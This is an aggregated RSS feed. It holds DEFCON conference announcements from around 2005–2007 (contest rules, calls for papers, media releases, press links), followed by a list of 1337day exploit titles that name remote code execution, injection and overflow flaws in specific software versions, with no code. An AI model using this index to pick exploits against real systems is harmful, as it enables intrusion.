https://www.defcon.org/defconrss.xml DEFCON 15 Artwork Contest Guidelines Submission deadline: All submissions must be received by June 25, 2007. Submit all entries to: sleestak\at\defcon dot org What we will do with your artwork: Art contests submissions will be added on-line to the DEFCON web site and may be included in the con program. By submitting artwork to us, you are allowing DEFCON to publish and reproduce your artwork in electronic and print formats. Categories: Web Banner Key Card T-shirt Wallpaper Required Elements: Artwork should incorporate a version of the following text: DEFCON / DefCon / Def Con with the number 15 / 2007 / Fifteen / 0x0F / XV / etc.. you get the point. It ties DEF CON to the year of the con. Artwork Preparation Specs: All continuous tone artwork must be at least 600dpi The following formats are accepted for artwork: - .EPS with Vector preferred, all fonts converted to outline - .Jpg - .Gif - .Psd - layers with all fonts converted to outline ***We strongly recommend Illustrator Vector artwork for any submissions for the T-shirt or Key Card categories since these will need to be reproduced in print. Prizes: 1. Winners will be contacted individually and be announced on the website and recognized in the DEFCON 15 printed program. 2. There may be multiple winners per category. 3. DEFCON reserves the right to not select a winner for every category Banner Art Prize: - The first place winner will receive free admission to DEFCON 15 for one person (non-transferable to a future con), $50 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. T-Shirt Art Prize: Free admission to DEFCON 15 for two persons, $130 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. Wallpaper Art Prize: Free admission to the conference for one person, $50 credit that may be used at the official DEFCON SWAG Store

==> Announcing Brew Wars!

https://www.defcon.org/defconrss.xml Announcing Brew Wars for DC 15! It's time to remind everyone of Brew Wars again. The very first Brew Wars will happen this year at Defcon 15. The rules are simple. Just bring twenty four ounces of your home brew to Defcon. A judging panel of three people, including myself, will drink and rate each brew. The beer will be rated on a scale of 1-10. Each beer will be judged in its category. The standard of each category of beer is last year's winner of the Great American Beer Festival in the style you have entered. A list of those winning beers can be found at the URL below. http://www.beertown.org/events/gabf/...medalists.aspx The judges will be blind tasting the beers. The only information given to the judges will be what style of beer it is. Judges will not be allowed to enter their own brews. Judges have already been selected. All judges were at the GABF and sampled all winning brews. Extensive tasting notes were taken at the time. I have sourced a glass carboy for the winner. This carboy will be etched with a logo commemorating the event. If your beer is good enough, you could soon be brewing your next batch in a unique carboy. Dr. Faustus

==> Robot Wars Arena Updated!

https://www.defcon.org/defconrss.xml Arena Updated! We've started building the new arena for this year's robot contest. The details about the arena and the build photos are here: http://defconbots.org/defcon15/arena.php So now that it's (almost) done, teams are invited to come practice on the actual arena if you want to get yourself to Orange County, CA :) If anyone has questions or if you need more detailed photos, please let me know! Kallahar

==> Contests starting up for DEFCON 15!

https://www.defcon.org/defconrss.xml DEFCON 15 Contests are starting to get organized! Interested in running a contest or competing in one? Check out the current list of what's happening over on the forums. Capture the Flag is back in full force, the Toxic BBQ is in effect, the Black and White Ball will happen as usual, and a whole host of new contests are getting ready. Some of them include: - The Amateur CtF - Beverage Cooling Contest - Brew Wars! - Coffee Wars - DefconBots Robot Contest - Hacker Jeopardy - Lockpicking Contest - LosT @ Con Mystery Challenge - QueerCon - Spot the Fed -The Summit meeting and party - Sushicon - Wireless Village, Lockpick Village and RFID village! - Sekret Challenge!

==> DEFCON 15 CFP Now Open!!

https://www.defcon.org/defconrss.xml DEFCON 15 Call For Papers is now officially Open and will close on June 15, 2007. Don't know what DEFCON is? Go to https://www.defcon.org/ and clue up! Papers and presentations are now being accepted for DEFCON 15, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, August 3-5, 2007. Last year, we eliminated speaking tracks, and we received a diverse selection of submissions. From hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We group presentations by subject and come up with topic areas of interest. It worked out so well in the past we are doing it again. What are we looking for then, if we don't have tracks? We're looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but blows their minds when they see it. We want strange demos of Personal GPS jammers, RFID zappers, and HERF madness. Got a MITM attack against cell phones? We want to see it. 
Subjects that we have traditionally covered in the past, and will continue to accept include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFO's, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouthful! Well you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year. Check out https://www.defcon.org/html/defcon-14/dc-14-speakers.html for past conference presentations to get a complete list of past topics that were accepted if you want to learn from the past. We are looking for and give preference to: unique research, new tool releases, day attacks (with responsible disclosure), highly technical material, social commentaries, and ground breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON. Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, or a break out format of a length you determine. 
We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an Honorarium. Remember being attacked by flying meat? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vapor ware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meat space. New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. 
You tell us how much time you need, and we try to accommodate you! To submit a speech Complete the Call for Papers Form at: https://www.defcon.org/html/defcon-15/dc-15-cfp-form.html and send to talks at defcon dot org. You will receive a confirmation within 48 hours of submission. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later than July 1. The sooner you submit the better chance you have of the reviewers to give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected. After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burnt on the CDROM, as well as information for the printed program. Speakers get in to the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more. 
Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity. Please visit: https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site. https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 15. Join in on the action. https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here. https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON. CFP forms and questions should get mailed to: talks/at/defcon.org

==> CSI: TCP/IP by Robin Mejia at wired.com

https://www.defcon.org/defconrss.xml "Keep your friends close and your enemies closer. Why the Pentagon's toughest Internet crime fighter likes hanging out with blackhat hackers" is the subtitle of the article. It turns out to be a well written piece about Jim Christy's career and the birth of the DoD Cybercrime Center. It is set to a backdrop of DEF CON 14, and has a couple funny bits, some interesting war stories plus a quote from me. A snip from the article: "Christy points out a pulsing vein in the guy's neck suggesting it's a sign he is lying. The guy calls Christy an old man. He hints that maybe he might have some small connection to Mossad. As he finally sits down, Christy passes him a business card."

==> Don't Be a Slacker, DEFCON 15 WANTS YOU!

https://www.defcon.org/defconrss.xml Starting March 1st we will be opening the call for papers for DEFCON 15 - the annual gathering of subversive computer folks. Earlier submissions are given higher priority, so prepare your best kung-foo, and send it our way. Remember, we are always looking for original and highly technical content, unusual subject matters, software releases, innovative hardware hacking, and generally mind-blowing content. Check out past convention archives to get an idea of what we are talking about. Once the date is closer there will be more specifics. I just wanted to give everyone a heads up!

==> DEFCON 14 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the second batch of content from DC-14 encoded for download. This marks the third step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The new media server will be going on-line in the next month, and because the old media server is out of drive space you will notice that all DC 7 content has been taken off line to make room. Once the new media server is on-line all past content will be restored!

==> DEFCON 14 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-14 encoded for download. This marks the third step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> Happy Holidays!

https://www.defcon.org/defconrss.xml Happy Holidays from all of us here at Defcon! We would like to wish you the best this Holiday season. We hope you have plenty of family, food and fun to go around. If you get bored you can always gather the family around the warm glow of your flat screen to watch the ghosts of presentations past. There is no better gift than that. Unless of course your loved ones headed over to Jinx and got you some sweet Defcon gear! We also wanted to remind you that pics.defcon.org is up and running, we are looking forward to seeing it grow with the new year. If you get together with your fellow hackers this holiday season, or mod that must have Christmas gift, feel free to upload your photos in the members and dc groups galleries. That said, eat plenty of other people's food, stay up late with your new shiny toys and have fun with friends and family. See you next year!

==> DEFCON 14 Presentations On-Line!

https://www.defcon.org/defconrss.xml We've gotten in some updated presentations, and have updated www.defcon.org to make them all available. So if you want to see the slides to a preso you missed, check out the link below. Next up we'll be posting the audio and video from DC-14 for download. DEF CON's XMas present to the community, coming in December.

==> pics.defcon.org now live!

https://www.defcon.org/defconrss.xml pics.defcon.org is now live for use. What is it you ask? Think of it as a repository for all pictures related to DEF CON. It is a place you can upload your pictures and arrange them however you want. Others can comment on them, vote, or put them in their own favorites album. The idea is that as people change providers there is no long term repository for DEF CON pictures except to the links www.defconpics.org points to. Because they don't mirror the content I wanted to create a free place for people to share their pictures that won't change or go down. The pics software is integrated with the defcon forums, so if you already have an account there you automatically have an account on pics.defcon.org. So get busy! Upload those pictures. Both http and https connections work. Spread the word!

==> DEFCON 12 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-12 encoded for download. This marks the second step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> DEFCON 12 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the second batch of content from DC-12 encoded for download. This marks the second step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> DEFCON 13 Videos of the Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml Here are the music videos of the music from the Black and White Ball at DEFCON 13. DJs include Wintamute, Ms. Jackalope, Shatter, Kris Klink and Casey with the bands Catharisis and Regenerator in the house!

==> DEFCON 13 Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml We took the audio .wav files and encoded them into .mp3 files. DJs include Wintamute, Ms. Jackalope, Shatter, Kris Klink and Casey with the bands Catharisis and Regenerator in the house!

==> DEFCON 14 Speakers Selected!

https://www.defcon.org/defconrss.xml Hey everyone, I want to make some announcements surrounding DEFCON 14. It's about that time to briefly lay down the inf0z, so here it goes. - Speakers have been selected, and are now listed on-line: http://www.defcon.org/html/defcon-14/dc-14-schedule.html They include an assistant Secretary of Defense, an FBI agent, Scary Hackers, privacy fanatics, security studs, and a hardware hacking ninja. - The con hotel is sold out, but overflow exists here: http://www.defcon.org/html/defcon-14/dc-14-hotel.html - Need a ride or got a room to spare? Check out the ride and room section of the DEF CON Forums https://forum.defcon.org/forumdisplay.php?f=26 - There are a lot of new contests, and some old ones that are no more (We'll miss you WiFi Shootout!) I'd mention them all, but it takes up too much space. To get a good grip on what is happening I'd suggest reading the contest area of the forums: https://forum.defcon.org/forumdisplay.php?f=102 - Black and White Ball is two nights this year, with some great bands and DJs including Regenerator, The Minibosses, DJ Jackalope, Catharsis and DJ Wintamute. - DEF CON 13 Audio and Video is now on-line for DOWNLOAD. Yep, you saw that right. We are phasing out the real media server and going to download mode. The audio is in .mp3, and the video is in H.264 2-pass 192k .mp4, optimized for the iPod video screen size. Right now you gotta subscribe to the rss feed, but the web site will soon sport the direct links. We hope to have DC-12 on-line in the next week. http://www.defcon.org/defconrss.xml Notes: This year we are at a new hotel, the Riviera. I did this because DEF CON was going to stagnate and die if it stayed at the Alexis Park any longer. The benefits of the new hotel are that the speaking rooms are larger, there is air conditioning, and we have room to grow. This year we get about 1/2 the space, and next year we should get 3/4 of the space. 
That extra room will allow us to offer break out classes, get togethers, and an additional track of speaking. Things we could only dream of before, but now are possible. It will take us all a year or two to learn what to do with all the space, but those are the kinds of problems I can live with. Did I mention the sky boxes? General hang out site: http://forum.defcon.org/ Remember DEF CON is what you make of it, and we have been lucky over the years to have a great group of people supporting us. The line up this year looks great, and the rest is up to us.

==> Crypto utopia Sealand ravaged by fire by Andrew Orlowski

https://www.defcon.org/defconrss.xml Andrew over at The Register writes about a fire that broke out on Sea Land wrecking the generator room. For those not familiar, there was a talk by Ryan Lackey of HavenCo, a company set up on Sea Land to provide privacy services. I believe it inspired some of the characters in Neal Stephenson's Cryptonomicon book (Go read it.. very good) I've wondered what happened since the business imploded in 2003, but from the article it seems not much. "Fire has damaged a World War II gun emplacement seven miles off the English coast. Better known as "Sealand", the fort was acquired in the 1960s by Roy Bates, who declared it an independent principality." "In a presentation to the 2003 DefCon convention, a former employee described how internal politics and a lack of investment backing had thwarted the experiment. Contracts were broken, the bandwidth never materialised, and the location was vulnerable to DOS attacks. At the time of his 2003 presentation, HavenCo had no new customers, and had seen several of its existing customers leave."

==> DEFCON 12 Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml We took the audio .wav files and encoded them into .mp3 files. We are working on DC-13 music next!

==> Cybersecurity contests go national by Robert Lemos

https://www.defcon.org/defconrss.xml I saw this over on SecurityFocus written by Rob Lemos, a long time Info Sec reporter with a solid reputation. It is a piece about how "Cybersecurity" events are going national. From Old old CTF games, to DEFCON, to the Cyber Defense Exercise (CDX) to the new CCDC it is all a progression of learning through different game challenges. It makes a couple brief mentions of DEFCON, but does not explain who or what we are. That's OK. If people really want to know, they'll find us. From the article: "As the hackers came in, you could see (the students') reactions: They were frustrated when they saw the attackers breach their systems and excited when they stopped the attack," said John Carr, a mentor for the team fielded by Valley High School of West Des Moines and senior solutions consultant with Iowa-based technology consulting firm QCI.

==> DEFCON 13 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-13 encoded for download. This marks the first step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The second release is .mp3 audio files in a friendly CBR 64k format. As time goes on we will be re-encoding all previous conference content and releasing it! Next up DEFCON 13 DJ music and video.

==> Database giant and British hacker make amends.

https://www.defcon.org/defconrss.xml From Robert McMillan at Computerworld some words about database security researcher and Oracle. DEFCON devotees may well recognize David's and Caesar's contributions to this space. Oracle once marketed its database as unbreakable, but security researcher David Litchfield has a less inflated opinion of the software. "God forbid that any of our critical national infrastructure runs on this product," he said recently on the widely read Bugtraq security mailing list. Oops it does.

==> Ride and Room sharing forum now open

https://www.defcon.org/defconrss.xml Going to DEFCON 13? Want to share a ride or a room? Got extra space in your car or room? Now is your chance to find others and make new friends. From TheCotMan's post about this: Suggestions: Your best bet in finding a ride, or room sharing is actually found by attending your local Defcon User Group, getting to know people in person, who then may give you space in their room. Trying to hook up with people on the Defcon Forums is a tricky thing. Generally, strangers won't offer other strangers space in their room. People will want some sort of references-- someone both parties know and trust to vouch for you. The Unofficial Defcon Faq http://defcon.stotan.org/faq/ was written by many, and assembled by HighWizard. It has some outdated information for when the convention was at the Alexis Park but also has some useful information about room sharing, and life at Defcon. Good luck.

==> DEFCON 13 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-13 encoded for download. This marks the first step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The first release is .mp4 video files in an iPod friendly h.264 format. Soon to follow will be the .mp3 versions of all the same presentations. As time goes on we will be re-encoding all previous conference content and releasing it!

==> DEFCON 14 Speaker Selection now underway.

https://www.defcon.org/defconrss.xml The speaker selection process for DEFCON 14 is now underway, with early selections being made. While the CfP closes officially in two weeks, we are doing early selection to fill half the speaking spots now to speed things up. We will try very hard to have the process completed in two weeks, right at the end of the deadline. We'll be making announcements on-line as well as on forums and mailing lists. If you submitted a talk, look for acceptance or rejections over the next two weeks in your email. I am proud to say some of the submissions this year are of very high quality, and we should break in the Riviera with some killer content. As usual we are talking about the con over on the forum.defcon.org system.

==> www.defcon.org now serving compressed content!

https://www.defcon.org/defconrss.xml Well it has taken a bit of work to get the old web server happy with serving http 1.1 compressed content, but now that it is you should see a speed improvement in page views as well as availability. These changes are in preparation for the site and server change over, something that I hope will happen in the next week. If your browser supports content-encoding compressed, you should see a gain! Also note that forums.defcon.org is also enabling compression later this week after some testing. This is a good thing leading up to the convention because it is effectively like buying more bandwidth with a software upgrade.

==> Capture the Flag pre-qualification opens!

https://www.defcon.org/defconrss.xml From Kenshoto's announcement: Once again ... kenshoto will be running the Defcon Capture the Flag contest in 2006. This year's CtF will be a knock-down-drag-out-cyberninja war, the likes of which the world has never seen (except maybe last year). For the qualifying round, we've widened the scope from last year. With multiple challenges in various categories, there's something for every hacker, regardless of skillset (except running scripts and writing perl). The core skill for this contest will be finding vulnerabilities in software. Those of you who have avoided playing in CtF because you think it is for lamers, we bet you can't find all our vulnerabilities. Teams will still need to defend a server, and will need to be able to exploit the vulnerabilities they find. As last year, the vulnerabilities will be 100%-custom, so leave your nessus, metasploit and core impact bleep at home. There will be a qualifying round, which will start on Friday, June 9th at 10:00 PM EDT. Only 8 teams will qualify. Last year's winners, Shellphish, are automatically qualified (leaving 7 team slots), unless they too decide to play in the qualifying round, in which case they will still need to place in the top 8. Registration is currently open at http://kenshoto.com/quals/ We encourage anyone (even individuals) to attempt to qualify, even if as a learning experience. We intend quals to be enjoyable for everyone, regardless of your plans for Defcon. Challenges will range wildly in difficulty from Mitnick to Eagle we've got it all. Good luck... you're going to need it. -kenshoto

==> DEFCON 14 CfP Closes at the end of the month!

https://www.defcon.org/defconrss.xml The Call for Papers for DEFCON 14 is closing soon. June 15th is the cut off date, but we will start making early speaking selections in the next two weeks.

==> Most lengthy DC trip report, ever. (warning, pdf)

https://www.defcon.org/defconrss.xml Want to get a group's perspective of DC13? While this 133 page .pdf is largely copied from various speeches, there are some pretty pictures, and the various contributors to the report did a good job. It must have been some work to put together. Check it out, and if you know of other reports like this one, please let us know.

==> DEFCON 14 Beta FAQ v0.95 Now Available!

https://www.defcon.org/defconrss.xml An update to the official FAQ talking about DEFCON and DEFCON 14. Questions and Answers about the new hotel location, costs, events, resources and more. The next update will include a split into two FAQs. One for general DEFCON questions, and one for DEFCON 14.

==> DEFCON places below pumpkin hurling contest!

https://www.defcon.org/defconrss.xml Who hails DEFCON as a noncommercial event, calls its attendees 'digital cognoscenti', throws in an oblique Linus bleep quote, and places DC as the 8th best North American geek fest? Follow the link to find out!

==> DEFCON 14 Call for Papers Open!

https://www.defcon.org/defconrss.xml We are opening the call for papers for DEFCON 14 - the annual gathering of subversive computer folks. Earlier submissions are given higher priority, so prepare your best kung-foo, and send it our way. Remember, we are always looking for original and highly technical content, unusual subject matters, software releases, innovative hardware hacking, and generally mind-blowing content. Check out past convention archives to get an idea of what we are talking about.

==> Getting a job as a Pen-Tester, DEFCON style

https://www.defcon.org/defconrss.xml If you thought being a pen-tester required knowledge, skill, and professionalism, Dmitri sets the record straight. His step-by-step tutorial will teach you how to write incoherent emails, slap imposing stickers on your notebook, and mumble with enough techno-bleep to become a world-renowned pen-tester at a big-name firm. Check out Dmitri's blog for the full article.

==> Trends of 2006 - Stealth Rootkit techniques as introduced at DC13 by Sherri Sparks and Jamie Butler

https://www.defcon.org/defconrss.xml Dennis Moreau, CTO of Configuresoft Inc, discusses security trends likely to appear in the coming year. In addition to discussing the limitations to black-list based security technologies, he highlights a dramatic DEFCON 13 speech. Sherri Sparks and Jamie Butler presented "Shadow-Walker" Raising The Bar For Rootkit Detection.

==> Global Capture the Flag comes to the classrooms worldwide

https://www.defcon.org/defconrss.xml 22 student teams from 18 universities on four continents competed in the largest Capture the Flag event ever attempted. Inspired by DEFCON's CTF and organized by DEFCON CTF winner Professor Vigna, the CTF event differed from DEFCON's contest by not limiting the number of teams and having international participation. Vigna's page describes his contest in enough detail to allow others to set up their own contests.

==> Renderman to the rescue!

https://www.defcon.org/defconrss.xml Renderman, winner of various contests at DEFCON, is written about in this article. "A Las Vegas magazine once described Renderman as 'infamous,' which he admits was flattering. He's only famous to other hackers."

==> DEFCON Staff, Speakers release new book "OS X for Hackers at Heart"

https://www.defcon.org/defconrss.xml Longtime DEFCON staffer Chris Hurley collaborates with DEFCON Speakers Bruce Potter, Johnny Long, and Ken Caruso to produce "OS X for Hackers at Heart."

==> DEFCON.ORG now SSL enabled!

https://www.defcon.org/defconrss.xml DEFCON.ORG is now SSLorized for your enhanced privacy and crypto happiness. Also SSL enabled for more private discussions - forum.defcon.org.

==> DEFCON 13 Write-up in the current issue of Blacklisted! 411

https://www.defcon.org/defconrss.xml The fall 2005 issue of Blacklisted! 411 has an extensive six page write-up of DEFCON that's worth reading. If you've never read Blacklisted, you should - it's a worthy mag.

==> DEFCON 14 Beta FAQ v0.91 Now Available!

https://www.defcon.org/defconrss.xml The first official FAQ talking about DEFCON, and DEFCON 14. Questions and Answers about the new hotel location, costs, events, resources and more. Please check it out and provide feedback so we can get a really solid v 1.0 FAQ out by the end of the year!

==> HP fires real bullet at Storageworks array

https://www.defcon.org/defconrss.xml Charlie Demerjian over at the Inquirer has a piece about HP shooting a .308 bullet at an XP12000 storage array, and the array still functioning. I have questions about where the bullet actually went, I mean if it smashed all the controller cards or went through the power supplies it wouldn't still function. But hey! They got it just right. The best part, though, is the end. 'The XP12000 was then brought back to a fully functional state without any loss of uptime. Not bad at all. As far as I know, this is the only test of its type, but I am sure we could arrange something similar at DefCon if Sun wants to loan us a 15K.'

==> DNS and Site Updates

https://www.defcon.org/defconrss.xml As DEFCON 14 gets closer, I plan on making some major network changes to better support the convention. I plan on moving the web site, forum, and store to new servers and ip addresses in the next month. Shortly after that I will be upgrading the media server and starting to release past conference archives for download. That is right, you read it here! No more real media streaming, soon you will be able to D/L the files directly in h.264 (Video iPod compatible) format. So this is just a heads up that things will be switching around over the next month or so.

==> remote - Java Web Start Double Quote Injection Remote Code Execution

http://www.1337day.com/rss

==> web - Wordpress WP-SendSMS Plugin 1.0 - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Weathermap 0.97c (editor.php, mapname param) - Local File Inclusion

http://www.1337day.com/rss

==> dos / - Cisco ASA < 8.4.4.6|8.2.5.32 Ethernet Information Leak

http://www.1337day.com/rss

==> web - Resin Application Server 4.0.36 XSS / Source Code Disclosure

http://www.1337day.com/rss

==> remote - MobileIron Virtual Smartphone Platform Privilege Escalation Exploit

http://www.1337day.com/rss

==> web - ZPanel 10.0.0.2 Remote Command Execution Vulnerability

http://www.1337day.com/rss

==> remote - Exim and Dovecot Insecure Configuration Command Injection

http://www.1337day.com/rss

==> remote - Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow

http://www.1337day.com/rss

==> web - Buffalo WZR-HP-G300NH2 Cross Site Request Forgery Vulnerability

http://www.1337day.com/rss

==> remote - Java Applet Driver Manager Privileged toString() Remote Code Execution

http://www.1337day.com/rss

==> remote - Sun Java Web Start Double Quote Injection Vulnerability

http://www.1337day.com/rss

==> web - NanoBB 0.7 Cross Site Scripting / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> dos / - Quick TFTP Server 2.2 - Denial of Service

http://www.1337day.com/rss

==> web - Asus RT56U 3.0.0.4.360 - Remote Command Injection

http://www.1337day.com/rss

==> web - Napata CMS 1.5.2013 PHP Code Injection Vulnerability

http://www.1337day.com/rss

==> web - JBoss AS Administrative Console Password Disclosure

http://www.1337day.com/rss

==> remote - Novell Zenworks Mobile Device Management Local File Inclusion

http://www.1337day.com/rss

==> web - RuubikCMS 1.1.1 - Path Traversal Vulnerability

http://www.1337day.com/rss

==> remote - Exim sender_address Parameter - RCE Exploit

http://www.1337day.com/rss

==> remote - Plesk Apache Zeroday Remote Exploit

http://www.1337day.com/rss

==> remote - Xpient Cash Drawer Operation Vulnerability

http://www.1337day.com/rss

==> web - Cuppa CMS Remote / Local File Inclusion Vulnerability

http://www.1337day.com/rss

==> web - gpEasy CMS 4.0 Shell Upload Vulnerability

http://www.1337day.com/rss

==> dos / - Mac OSX Server DirectoryService Buffer Overflow

http://www.1337day.com/rss

==> remote - MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution

http://www.1337day.com/rss

==> web - CMS Gratis Indonesia PHP Code Injection Vulnerability

http://www.1337day.com/rss

==> remote - Imperva SecureSphere Operations Manager Command Execution Vulnerability

http://www.1337day.com/rss

==> remote - DS3 Authentication Server Command Execution Vulnerability

http://www.1337day.com/rss

==> web - Seowonintech Routers Remote Root File Dumper

http://www.1337day.com/rss

==> web - Netgear DGN1000 / DGN2200 Authentication Bypass / Command Execution

http://www.1337day.com/rss

==> web - Netgear WPN824v3 Unauthorized Config Download

http://www.1337day.com/rss

==> dos / - LogMeIn Hamachi <= 2.1.0.362 Remote DOS

http://www.1337day.com/rss

==> web - Umbraco CMS 4.x Arbitrary aspx File Upload Vulnerability

http://www.1337day.com/rss

==> web - PHD Help Desk 2.12 - SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit

http://www.1337day.com/rss

==> web - PhpTax 0.8 Code Execution Vulnerability

http://www.1337day.com/rss

==> web - PHP4DVD 2.0 Code Injection Vulnerability

http://www.1337day.com/rss

==> web - Elastix 2.4.0 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - HtmlCommentBox Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> remote - Apache Struts includeParams Remote Code Execution

http://www.1337day.com/rss

==> web - MyBB Ajax Chat SQL Vulnerability

http://www.1337day.com/rss

==> remote - Oracle WebCenter Content CheckOutAndOpen.dll ActiveX RCE

http://www.1337day.com/rss

==> local - BOINC Manager (SETI at Home) version 7.0.64 Field stack based BOF

http://www.1337day.com/rss

==> dos / - ModSecurity Remote Null Pointer Dereference Vulnerability

http://www.1337day.com/rss

==> remote - Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> local - Zyxel NBG5715 Local admin privileges bypass Vulnerability

http://www.1337day.com/rss

==> dos / - Monkey HTTPD 1.1.1 - Crash PoC

http://www.1337day.com/rss

==> remote - Logic Print 2013 - Stack Overflow (vTable Overwrite)

http://www.1337day.com/rss

==> remote - Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

http://www.1337day.com/rss

==> web - WordPress User Role Editor 3.12 Cross Site Request Forgery

http://www.1337day.com/rss

==> web - DIF Log Search Widget 1.0e Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Zavio IP Camera Command Injection / Bypass Vulnerabilities

http://www.1337day.com/rss

==> remote - IBM SPSS SamplePower C1Tab ActiveX Heap Overflow Vulnerability

http://www.1337day.com/rss

==> web - MayGion IP Camera Path Traversal / Buffer Overflow

http://www.1337day.com/rss

==> web - TP-Link IP Camera Hardcoded Credentials / Command Injection

http://www.1337day.com/rss

==> dos / - CodeBlocks 12.11 (Mac OS X) - Crash POC

http://www.1337day.com/rss

==> web - TP-LINK WR842ND Remote Multiple SSID Directory Traversal Exploit

http://www.1337day.com/rss

==> web - YeaLink IP Phone Firmware <=9.70.0.100 Unauthenticated Phone Call Vulnerability

http://www.1337day.com/rss

==> local - AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

http://www.1337day.com/rss

==> remote - PEStudio 3.69 - Denial of Service

http://www.1337day.com/rss

==> remote - CompatUI ActiveX Control <= Remote Command Execution

http://www.1337day.com/rss

==> web - HP LaserJet Pro P1606dn - Webadmin Password Reset

http://www.1337day.com/rss

==> web - Vanilla Forums 2.0.18.8 - Insecure Permissions / XSS Vulnerabilities

http://www.1337day.com/rss

==> web - Wordpress User Role Editor Plugin 3.12 - CSRF Vulnerability

http://www.1337day.com/rss

==> dos / - SIEMENS Solid Edge ST4 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE

http://www.1337day.com/rss

==> remote - SIEMENS Solid Edge ST4 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE

http://www.1337day.com/rss

==> web - XOOPS 2.5.6 CSRF Vulnerability

http://www.1337day.com/rss

==> web - MyMarket 1.72 bypass admin login & product_details blind sqli

http://www.1337day.com/rss

